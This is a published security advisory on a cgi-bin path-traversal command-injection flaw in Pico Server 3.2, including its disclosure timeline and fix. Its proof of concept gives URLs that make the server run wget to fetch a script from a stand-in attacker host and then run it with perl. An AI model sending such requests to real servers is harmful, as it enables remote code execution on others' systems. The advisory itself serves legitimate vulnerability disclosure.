Advisory: Pico Server (pServ) Remote Command Injection RedTeam found a remote command injection in Pico Server (pServ) which results in a remote attacker being able to issue arbitrary commands on the server. Details ======= Product: Pico Server (pServ) Affected Version: 3.2(verified), <=3.2 probably too Immune Version: 3.3 OS affected: all Security-Risk: very high Remote-Exploit: yes Vendor-URL: http://pserv.sourceforge.net/ Vendor-Status: new version available Advisory-URL: http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-010 Advisory-Status: published CVE: CAN-2005-1365 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1365 #) Introduction ============ >From http://pserv.sourceforge.net/ Pico Server is a small web server. It is meant to be portable and configurable. * small, portable * fast * CGI-BIN support * auto-indexing of directories * access and error logging (see p-reporter for an analyzer) * forking or single-connection at choice Pico Server (pServ) is written in portable C (K&R style so it can compile on older compilers too) and sports several options that by means of #define statements can customize the behavior, the performance and the feature set so to be able to fit better the the requisites. If pServ is compiled with support for CGI-BIN a remote attacker is able to execute any program (with pServ permissions) on the server by traversing out of the cgi-bin directory. More Details ============ pServ has CGI-BIN support. Only URLs beginning with "cgi-bin" are treated as cgi-scripts. To avoid that a user traverses out of the cgi-bin using traditional /../, pServ parses the requested url. It increases a counter by one if it parses a / (new subdir) and decreases the counter if ist parses /../. If the counter goes below zero the url is rejected as illegal. Unfortunately an attacker can avoid beeing rejected, just using enough / in the url (without directory names between them), so he can traverse out of the cgi-bin by adding some /../ . This lets the attacker execute any program on the server (with pServ permissions). Proof of Concept ================ The following url downloads a script (or executable) to the server: http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q+http://evil-site/evil.pl/+-O+/tmp/evil.pl This is how the script can be executed afterwards: http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl Workaround ========== The only workaround is to compile pServ without support for cgi-bin. Fix === The Developers have released Version 3.3. This version should fix the problem. The changes have not been tested by RedTeam, yet. Security Risk ============= The security risk is rated very high because a remote attacker can use this flaw to execute arbitrary code on the server (with the permissions of pServ). History ======= 2005-04-29 found 2005-05-02 first attempt to inform developers 2005-05-02 CAN-number assigned 2005-05-04 second attempt to inform developers 2005-05-16 new version released. Advisory published RedTeam ======= RedTeam is a penetration testing group working at the Laboratory for Dependable Distributed Systems at RWTH-Aachen University. You can find more Information on the RedTeam Project at http://tsyklon.informatik.rwth-aachen.de/redteam/